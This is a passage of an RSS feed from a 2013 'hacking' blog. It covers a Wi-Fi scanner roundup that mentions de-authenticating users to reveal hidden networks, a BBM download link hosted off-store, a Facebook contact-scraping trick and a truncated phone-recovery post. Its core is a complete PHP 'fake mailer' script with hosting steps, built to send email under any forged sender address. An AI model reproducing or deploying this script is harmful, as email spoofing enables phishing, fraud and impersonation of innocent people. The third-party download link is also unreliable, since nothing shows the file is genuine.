Editor’s Note: If you haven’t noticed, all of the network scanning tools above can only discover invisible wireless networks but they cannot reveal the hidden SSID. Most of them shows a blank SSID while only NetSurveyor shows UNKNOWN_SSID and Xirrus Wi-Fi Inspector shows Non-Broadcasted. There are some wireless utility that is installed together with the wireless adapter driver capable of showing hidden networks. Although the Windows wardriving tools is unable to reveal the hidden SSID in invisible wireless networks, it doesn’t mean that hiding SSID broadcast is safe. The hidden SSID can be revealed by de-authenticating connected users using aireplay-ng that is found in BackTrack Linux.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="border: 0px; font-family: Verdana, Geneva, Tahoma, sans-serif; font-size: 11px; line-height: 17px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Source:&amp;nbsp;http://www.raymond.cc&lt;br /&gt;Read more:&amp;nbsp;http://www.raymond.cc/blog/how-to-discover-hidden-wireless-network/#ixzz2itoqi6G8&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/10/top-8-wifi-scanners-for-ms-windows.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7zvYPRvCZioef0LDCDFLheMQcKKLog3sWEX5qg7OqqUCkPK4_GJ5vSM4fUyAq3GChSqlcw94mGH9qBOkps57RMwHro5IZw6WqwgIJ91165oPQQrdgYuMKpPiTTpVRjGX2wV-CmDrEtGg/s72-c/Top-8-WiFi-Scanners-For-Ms-Windows.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-2309654910759439805</guid><pubDate>Tue, 22 Oct 2013 14:10:00 +0000</pubDate><atom:updated>2013-10-27T10:16:21.333-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Blogger</category><category domain="http://www.blogger.com/atom/ns#">Buffer Overflow</category><category domain="http://www.blogger.com/atom/ns#">Cryptography</category><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Evading IDS</category><category domain="http://www.blogger.com/atom/ns#">Firewalls</category><category domain="http://www.blogger.com/atom/ns#">Hacking Wireless</category><category domain="http://www.blogger.com/atom/ns#">Honeypots</category><category domain="http://www.blogger.com/atom/ns#">Mobile Hacking</category><category domain="http://www.blogger.com/atom/ns#">Penetration Testing</category><category domain="http://www.blogger.com/atom/ns#">SQL Injection</category><title>Blackberry Messenger for Android</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: left;"&gt;
Blackberry Messenger for Android (BBM Download)&lt;/h2&gt;
&lt;div&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/DybCnw" rel="nofollow" target="_blank"&gt;&lt;span style="font-size: large;"&gt;Download Here&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
MD5:501082eb365053865c169548a7a51a51&lt;br /&gt;SHA1:5458b79501bae4e2ad85ed90e44ed1e67a76aa1c&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;Download Official Play Store&lt;br /&gt;&lt;b style="text-align: center;"&gt;&lt;a href="https://play.google.com/store/apps/details?id=com.bbm" rel="nofollow" target="_blank"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG55ZBYQcLg_BeyPA0QmFFVAkILzbVpJICe15mdtshRBzuKEsQrZR5xDQlKe2GwekCwpKGJG2ZQcomuthyRjb0CZ9qpHcc-gDOWlsDPRO0wJk_h2rgl3WyXt1IzjphXV0PaXJALywyltQ/s1600/Play_Store_icon_Hack+Hippo.png" height="50" width="50" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
Description&lt;br /&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMeXKvcg0kvnZqxqS3oxtOPsz2xjK5fG3lmRrJ1tb4q9VO1mHamTP5CCpghrF10acZhoxBWiAszgT2mOXVCyBZ9a6Ns0-Ol1Vuk8cK_NIA_5x9EDUh226n7CSP46VpgztT4Cx9xlSbGaI/s1600/BlackBerry-Bbm-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMeXKvcg0kvnZqxqS3oxtOPsz2xjK5fG3lmRrJ1tb4q9VO1mHamTP5CCpghrF10acZhoxBWiAszgT2mOXVCyBZ9a6Ns0-Ol1Vuk8cK_NIA_5x9EDUh226n7CSP46VpgztT4Cx9xlSbGaI/s1600/BlackBerry-Bbm-1.png" /&gt;&lt;/a&gt;The OFFICIAL version of BBM™ from&lt;br /&gt;
BlackBerry is now here for Android. Get the free BBM app for the best way to stay connected with friends and family. Download it now.&lt;br /&gt;
Chat with friends on Android, BlackBerry and iPhone:&lt;br /&gt;
• BBM is always on and always connected – no app to open&lt;br /&gt;
• Know when messages have been delivered (D’s) and read (R’s)&lt;br /&gt;
• Share photos, files, documents, voice notes and more&lt;br /&gt;
• See when contacts are responding to your message&lt;br /&gt;
• Emoticons for every mood and emotion let you express yourself&lt;br /&gt;
&lt;br /&gt;
BBM lets you protect your privacy. You control it:&lt;br /&gt;
• You chose how to share your information - BBM uses PINs instead of phone numbers or email addresses so that it's more private and you always control who can contact you&lt;br /&gt;
• You chose your contacts – 2-way opt-in means you have control over who is able to message you&lt;br /&gt;
Chat and Share with many at once:&lt;br /&gt;
• Groups – BBM groups help you share pictures, lists and appointments with group members. You can even be in a group with people who aren't part of your own BBM contact list.&lt;br /&gt;
• Multi-person chats – Invite multiple contacts to have a chat together.&lt;br /&gt;
• Broadcast messages – Send a message to multiple BBM contacts at one time.&lt;br /&gt;
Create your own BBM profile:&lt;br /&gt;
• Post a profile picture using images, pictures or even animated pictures (GIFs).&lt;br /&gt;
• Update your status to let people know what you’re up to or how you feel&lt;br /&gt;
Download BBM for free today.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfV20wzYK1vKRumyOgzpevGshc9bdliJPXiJLcRndwKF1ZEm3-0xfs8iJjPMib3L_PKTsFNsKZkVM2-dMkeoRiJq8AdIozFMWtWkIxRTiV28G3NRL_sWrJoeb7W7QfK60b6cpzW1h0Dpo/s1600/BlackBerry-Bbm+%25282%2529.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfV20wzYK1vKRumyOgzpevGshc9bdliJPXiJLcRndwKF1ZEm3-0xfs8iJjPMib3L_PKTsFNsKZkVM2-dMkeoRiJq8AdIozFMWtWkIxRTiV28G3NRL_sWrJoeb7W7QfK60b6cpzW1h0Dpo/s1600/BlackBerry-Bbm+%25282%2529.png" height="320" width="179" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrmVB0LBNjc7RKtjdfhMESeSshBqnhyphenhyphen5SdJu4MiH8D1A6NhrZPmbAWSt2EIvgqcKVTwrltfhUbnY9YbBfzM8ihl2yuKSeN0mzjmX0A65owv83LnTYVFnyzYgbYCI0O8ods7cBKpTC0UFw/s1600/BlackBerry-Bbm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrmVB0LBNjc7RKtjdfhMESeSshBqnhyphenhyphen5SdJu4MiH8D1A6NhrZPmbAWSt2EIvgqcKVTwrltfhUbnY9YbBfzM8ihl2yuKSeN0mzjmX0A65owv83LnTYVFnyzYgbYCI0O8ods7cBKpTC0UFw/s1600/BlackBerry-Bbm.png" height="320" width="179" /&gt;&lt;/a&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/10/blackberry-messenger-for-android.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG55ZBYQcLg_BeyPA0QmFFVAkILzbVpJICe15mdtshRBzuKEsQrZR5xDQlKe2GwekCwpKGJG2ZQcomuthyRjb0CZ9qpHcc-gDOWlsDPRO0wJk_h2rgl3WyXt1IzjphXV0PaXJALywyltQ/s72-c/Play_Store_icon_Hack+Hippo.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-3354786999421957855</guid><pubDate>Sat, 05 Oct 2013 03:07:00 +0000</pubDate><atom:updated>2013-10-04T20:07:20.952-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Blogger</category><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Educational</category><category domain="http://www.blogger.com/atom/ns#">Hackers</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><title>Fake mailer php script</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Fake Mailer Script&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBuhLhqj-28ME7DXstEvaebf0UdxWWgW01SvLoXt0LQ9XnKhbA126-Tmqx-FbdNfoh5yhi8KSoxY8HCbuaeZfx96z3UzedaQ-K8eDGN2mMyI6TEhMGsG8-Yk6Q3ESzdMHGvAm9AE7UUdA/s1600/Fake-Mailer-Script-hack-hippo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBuhLhqj-28ME7DXstEvaebf0UdxWWgW01SvLoXt0LQ9XnKhbA126-Tmqx-FbdNfoh5yhi8KSoxY8HCbuaeZfx96z3UzedaQ-K8eDGN2mMyI6TEhMGsG8-Yk6Q3ESzdMHGvAm9AE7UUdA/s1600/Fake-Mailer-Script-hack-hippo.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
1.Copy Following Code to Notepad.&lt;br /&gt;
2.Then Save it as .php extension.&lt;br /&gt;
3.Got to some free webhosting site which support php.&lt;br /&gt;
4.Register Your Self.&lt;br /&gt;
5.Upload Your File.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://share.cx.com/St34gN" rel="nofollow" target="_blank"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;Download&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html lang="en-us"&amp;gt;&lt;br /&gt;
&amp;lt;head&amp;gt;&lt;br /&gt;
&amp;lt;meta charset="windows-1252"&amp;gt;&lt;br /&gt;
&amp;lt;body bgcolor=black&amp;gt;&amp;lt;center&amp;gt;&amp;lt;font color=white&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt; HaCkHiPp0 Anonymous Mail Sender (For Educational Purpose Only) &amp;lt;/h2&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;Title&amp;gt;Fake Mailer&amp;lt;/Title&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;form action="&amp;lt;?php $_SERVER['SELF'] ?&amp;gt;" method="post"&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To: &amp;lt;input type="text" name="to"&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
From: &amp;lt;input type="text" name="from"&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Subject: &amp;lt;input type="text" name="subject"&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Message:&lt;br /&gt;
&amp;lt;textarea name="message"&amp;gt;&amp;lt;/textarea&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;input type="submit" name="submit" value="Send"&amp;gt;&amp;lt;/form&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
if (isset($_POST['submit'])) {&lt;br /&gt;
$to=$_POST['to'];&lt;br /&gt;
$from=$_POST['from'];&lt;br /&gt;
$subject=$_POST['subject'];&lt;br /&gt;
$message=$_POST['message'];&lt;br /&gt;
$head="From: $from" . &amp;nbsp;"\r\n".&lt;br /&gt;
'Reply-To: '. $from . &amp;nbsp;"\r\n";&lt;br /&gt;
$her=$head.' &amp;lt; '.$from .' &amp;gt;';&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$ret=mail($to, $subject, $message, $her);&lt;br /&gt;
if($ret==true){&lt;br /&gt;
echo "&amp;lt;br /&amp;gt; Mail sent Successfully";&lt;br /&gt;
}else{&lt;br /&gt;
echo "&amp;lt;br /&amp;gt; Unable to Send mail.";&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;a href="http://hackhipoo.blogspot.com"&amp;gt;&amp;amp;copy; HaCkHiPp0-TeaM&amp;lt;/a&amp;gt;.&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;a href="https://twitter.com/sahilrai85"&amp;gt;R0oTx:Sahil_Rai&amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...................................................................................................................................&lt;br /&gt;
&lt;br /&gt;
Thanks to visit hack hippo&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/10/fake-mailer-php-script.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBuhLhqj-28ME7DXstEvaebf0UdxWWgW01SvLoXt0LQ9XnKhbA126-Tmqx-FbdNfoh5yhi8KSoxY8HCbuaeZfx96z3UzedaQ-K8eDGN2mMyI6TEhMGsG8-Yk6Q3ESzdMHGvAm9AE7UUdA/s72-c/Fake-Mailer-Script-hack-hippo.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-4089455870832195478</guid><pubDate>Fri, 16 Aug 2013 18:28:00 +0000</pubDate><atom:updated>2013-11-11T08:47:01.864-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Educational</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>Hack Facebook Friend Private Email Addresses</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: center;"&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;Find Facebook Friend&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="text-align: left;"&gt;&lt;span style="color: #333333; font-family: Lucida Grande, Arial, Helvetica, sans-serif; font-size: large;"&gt;Private Email Addresses&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghutYhV2IFWea8Vm0USyK-A4DkgVO9ZvQfaIVYaadHxf8Y3luoujjp_dDC5stT8u1yF6PrF1y6qyK9_w5wDcvzZXnSiJi65n2zYqJry5Fzdb2M-rlNxqxS9hZuakHRsjZKkx6QiUPc8Sk/s1600/Private-Email-Addresses.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img alt="Find Facebook Friend Private Email Addresses" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghutYhV2IFWea8Vm0USyK-A4DkgVO9ZvQfaIVYaadHxf8Y3luoujjp_dDC5stT8u1yF6PrF1y6qyK9_w5wDcvzZXnSiJi65n2zYqJry5Fzdb2M-rlNxqxS9hZuakHRsjZKkx6QiUPc8Sk/s1600/Private-Email-Addresses.jpg" height="205" title="Find Facebook Friend Private Email Addresses" width="500" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Find An Email Address of Facebook Friend&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;Welcome to Hack Hippo Friends Today we are learn how  to get hidden and privacy protected email address on your facebook friends&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;Step 1: Sign Up for (or Sign Into) &lt;a href="http://mail.yahoo.com/" rel="nofollow" target="_blank"&gt;Yahoo Mail&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;Step 2: Goto &lt;a href="http://address.yahoo.com/"&gt;Yahoo address&lt;/a&gt; and click on facebook icon then show dialog box will be appear that will ask your consent.Stay few time and than you are completely avail your all facebook friends e-mail address.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMbrwuvvUNe4Zxfiwu4zV75sIkJVCdEMx2xrQ5V1dlzAYFDJ-5l9_rqsZyThioupneMKps888mRplYxyTz-K_qmkuRWy2FmfPADsf5jAM8h-IxHaXRa9wB3UMQVh-9enoCjoImMnYfpxQ/s1600/facebook-Private+Email-Addresses+%25282%2529.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img alt="Click For Full Screen Zoom" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMbrwuvvUNe4Zxfiwu4zV75sIkJVCdEMx2xrQ5V1dlzAYFDJ-5l9_rqsZyThioupneMKps888mRplYxyTz-K_qmkuRWy2FmfPADsf5jAM8h-IxHaXRa9wB3UMQVh-9enoCjoImMnYfpxQ/s1600/facebook-Private+Email-Addresses+%25282%2529.jpg" height="100" title="Click For Full Screen Zoom" width="250" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Click For Full Screen Zoom&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiERic-sOGayQXKW-WnT-GBhThgR6LX1ra4d_Sz4Nnr85snuUttgQ1FhTrw-lwY4foQlxGdLSlB0MHG3nH9HKpJSgTP5QuhupP5zkc079OFTQpH2uFQbbJK_2DUCWNKpi1dY-OLPwe3Gcg/s1600/facebook-Private+Email-Addresses+(1).jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img alt="Click For Full Screen Zoom" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiERic-sOGayQXKW-WnT-GBhThgR6LX1ra4d_Sz4Nnr85snuUttgQ1FhTrw-lwY4foQlxGdLSlB0MHG3nH9HKpJSgTP5QuhupP5zkc079OFTQpH2uFQbbJK_2DUCWNKpi1dY-OLPwe3Gcg/s1600/facebook-Private+Email-Addresses+(1).jpg" height="100" title="Click For Full Screen Zoom" width="250" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Click For Full Screen Zoom&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1wHolHT8-k4THf2I2Q_FZI-qKd9ZqPWZU5bLEVPp8ZHLINrhtcT0l8i_buibfVfJZHGkfn4RQ_MjYjPEGD0uHvk4oOubGbefBaUgu3OonGjqs9AmYStTd6cpftV8lNx13I72tHvepWw/s1600/facebook-Private+Email-Addresses+%25284%2529.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img alt="Click For Full Screen Zoom" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1wHolHT8-k4THf2I2Q_FZI-qKd9ZqPWZU5bLEVPp8ZHLINrhtcT0l8i_buibfVfJZHGkfn4RQ_MjYjPEGD0uHvk4oOubGbefBaUgu3OonGjqs9AmYStTd6cpftV8lNx13I72tHvepWw/s1600/facebook-Private+Email-Addresses+%25284%2529.jpg" height="100" title="Click For Full Screen Zoom" width="250" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Click For Full Screen Zoom&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKW9Gb9KgGS8aYA1NgSIFXj4OA0dKcqN3lfmF28x_6UmjaSX33pbDVradiYPJH4pR5hZOIy6zWFa7rNTKTNuRCjaSroZIEkaNrgF7ZLKOduiyh7X7qICJ4aJMiSBt1MvrNIgc_whx8zv4/s1600/facebook-Private+Email-Addresses+%25283%2529.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img alt="Click For Full Screen Zoom" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKW9Gb9KgGS8aYA1NgSIFXj4OA0dKcqN3lfmF28x_6UmjaSX33pbDVradiYPJH4pR5hZOIy6zWFa7rNTKTNuRCjaSroZIEkaNrgF7ZLKOduiyh7X7qICJ4aJMiSBt1MvrNIgc_whx8zv4/s1600/facebook-Private+Email-Addresses+%25283%2529.jpg" height="100" title="Click For Full Screen Zoom" width="250" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Click For Full Screen Zoom&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
Now check the name of the friend to whom you have to find the email address and than you can simply find any email of Facebook friends and make contact with email also.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
© HaCkHiPp0-TeaM.&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
R0oTx:Sahil_Rai,&amp;nbsp;Manish Pathak (1337C001),&amp;nbsp;p7771 (p@nku k@p0or)&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="color: #333333; font-family: Lucida Grande, Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/08/hack-facebook-friend-private-email.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghutYhV2IFWea8Vm0USyK-A4DkgVO9ZvQfaIVYaadHxf8Y3luoujjp_dDC5stT8u1yF6PrF1y6qyK9_w5wDcvzZXnSiJi65n2zYqJry5Fzdb2M-rlNxqxS9hZuakHRsjZKkx6QiUPc8Sk/s72-c/Private-Email-Addresses.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-6894713797443932736</guid><pubDate>Fri, 16 Aug 2013 16:26:00 +0000</pubDate><atom:updated>2013-08-16T09:26:21.762-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Blogger</category><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Mobile</category><title>Clockworkmod Recovery on Micromax A35 Bolt</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: left;"&gt;
How to install Clockworkmod recovery on Micromax A35 Bolt&lt;/h2&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="color: lime; font-size: large;"&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: lime; font-size: large;"&gt;&lt;u&gt;Requirements:&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;b style="color: lime;"&gt;&lt;span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;&lt;u&gt;RecoveryManager_v0.36b.apk&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
